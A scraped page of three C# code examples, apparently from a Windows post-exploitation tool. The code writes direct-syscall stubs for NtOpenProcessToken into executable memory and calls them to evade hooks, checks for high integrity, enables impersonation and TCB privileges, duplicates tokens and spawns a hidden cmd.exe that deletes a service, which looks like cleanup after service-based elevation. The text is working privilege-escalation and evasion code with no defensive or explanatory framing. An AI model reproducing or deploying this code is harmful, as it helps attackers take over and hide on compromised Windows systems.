Exemplo n.º 1
0
        public static void getProcessToken(IntPtr handle, TokenAccessFlags access, out IntPtr currentToken, SyscallManager syscall)
        {
            IntPtr baseAddr = IntPtr.Zero;

            byte[] shellcode       = syscall.getSyscallASM("NtOpenProcessToken");
            var    shellcodeBuffer = VirtualAlloc(IntPtr.Zero, (UIntPtr)shellcode.Length, MemoryAllocationFlags.Commit | MemoryAllocationFlags.Reserve, MemoryProtectionFlags.ExecuteReadWrite);

            Marshal.Copy(shellcode, 0, shellcodeBuffer, shellcode.Length);
            var    syscallDelegate = Marshal.GetDelegateForFunctionPointer(shellcodeBuffer, typeof(NtOpenProcessToken));
            IntPtr token           = IntPtr.Zero;
            var    arguments       = new object[] { handle, access, token };
            var    returnValue     = syscallDelegate.DynamicInvoke(arguments);

            currentToken = (IntPtr)arguments[2];
        }
Exemplo n.º 2
0
        // Code from https://www.pinvoke.net/default.aspx/Constants/SECURITY_MANDATORY.html
        public static bool IsHighIntegrity(SyscallManager syscall)
        {
            IntPtr pId = (Process.GetCurrentProcess().Handle);

            IntPtr hToken = IntPtr.Zero;

            IntPtr baseAddr = IntPtr.Zero;

            byte[] shellcode       = syscall.getSyscallASM("NtOpenProcessToken");
            var    shellcodeBuffer = VirtualAlloc(IntPtr.Zero, (UIntPtr)shellcode.Length, MemoryAllocationFlags.Commit | MemoryAllocationFlags.Reserve, MemoryProtectionFlags.ExecuteReadWrite);

            Marshal.Copy(shellcode, 0, shellcodeBuffer, shellcode.Length);
            var    syscallDelegate = Marshal.GetDelegateForFunctionPointer(shellcodeBuffer, typeof(NtOpenProcessToken));
            IntPtr token           = IntPtr.Zero;
            var    arguments       = new object[] { pId, TokenAccessFlags.TOKEN_QUERY, token };
            var    returnValue     = syscallDelegate.DynamicInvoke(arguments);

            if ((int)returnValue == 0)
            {
                try
                {
                    hToken = (IntPtr)arguments[2];
                    IntPtr pb = Marshal.AllocCoTaskMem(1000);
                    try
                    {
                        uint cb = 1000;
                        if (GetTokenInformation(hToken, TOKEN_INFORMATION_CLASS.TokenIntegrityLevel, pb, cb, out cb))
                        {
                            IntPtr pSid = Marshal.ReadIntPtr(pb);

                            int dwIntegrityLevel = Marshal.ReadInt32(GetSidSubAuthority(pSid, (Marshal.ReadByte(GetSidSubAuthorityCount(pSid)) - 1U)));

                            return(dwIntegrityLevel >= SECURITY_MANDATORY_HIGH_RID ? true : false);
                        }
                    }
                    finally
                    {
                        Marshal.FreeCoTaskMem(pb);
                    }
                }
                finally
                {
                    CloseHandle(hToken);
                }
            }

            return(false);
        }
Exemplo n.º 3
0
        public void Start()
        {
            SyscallManager syscall = new SyscallManager();


            try
            {
                IntPtr        token  = WindowsIdentity.GetCurrent().Token;
                List <string> aPrivs = new List <string>();

                aPrivs.Add("SeImpersonatePrivilege");
                aPrivs.Add("SeTcbPrivilege");
                aPrivs.Add("SeAssignPrimaryTokenPrivilege");
                aPrivs.Add("SeIncreaseQuotaPrivilege");

                IntPtr currentToken;

                IntPtr baseAddr        = IntPtr.Zero;
                byte[] shellcode       = syscall.getSyscallASM("NtOpenProcessToken");
                var    shellcodeBuffer = VirtualAlloc(IntPtr.Zero, (UIntPtr)shellcode.Length, MemoryAllocationFlags.Commit | MemoryAllocationFlags.Reserve, MemoryProtectionFlags.ExecuteReadWrite);
                Marshal.Copy(shellcode, 0, shellcodeBuffer, shellcode.Length);
                var    syscallDelegate = Marshal.GetDelegateForFunctionPointer(shellcodeBuffer, typeof(NtOpenProcessToken));
                IntPtr t           = IntPtr.Zero;
                var    arguments   = new object[] { Process.GetCurrentProcess().Handle, TokenAccessFlags.TOKEN_ADJUST_PRIVILEGES, t };
                var    returnValue = syscallDelegate.DynamicInvoke(arguments);

                currentToken = (IntPtr)arguments[2];
                enablePrivileges(currentToken, aPrivs);

                CloseHandle(currentToken);

                TokenAccessFlags tokenAccess = TokenAccessFlags.TOKEN_QUERY | TokenAccessFlags.TOKEN_ASSIGN_PRIMARY |
                                               TokenAccessFlags.TOKEN_DUPLICATE | TokenAccessFlags.TOKEN_ADJUST_DEFAULT |
                                               TokenAccessFlags.TOKEN_ADJUST_SESSIONID;

                IntPtr newToken = IntPtr.Zero;
                if (!DuplicateTokenEx(token, tokenAccess, IntPtr.Zero, SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, TOKEN_TYPE.TokenPrimary, out newToken))
                {
                    return;
                }

                STARTUPINFO startupInfo = new STARTUPINFO();
                startupInfo.cb          = Marshal.SizeOf(startupInfo);
                startupInfo.lpDesktop   = "";
                startupInfo.wShowWindow = 0;
                startupInfo.dwFlags    |= 0x00000001;

                PROCESS_INFORMATION processInfo = new PROCESS_INFORMATION();
                LogonFlags          l           = new LogonFlags();

                if (CreateProcessAsUserW(newToken, @"c:\windows\system32\cmd.exe /Q /C sc delete NewDefaultService2 && exit", null, IntPtr.Zero, IntPtr.Zero, false, 0, IntPtr.Zero, null, ref startupInfo, out processInfo))
                {
                    TokenManager.Token  = newToken;
                    TokenManager.Method = 1;
                }
                else
                {
                    if (CreateProcessWithTokenW(newToken, l, @"c:\windows\system32\cmd.exe /Q /C sc delete NewDefaultService2 && exit", null, 0, IntPtr.Zero, null, ref startupInfo, out processInfo))
                    {
                        TokenManager.Token  = newToken;
                        TokenManager.Method = 2;
                    }
                }
            }
            catch { }
        }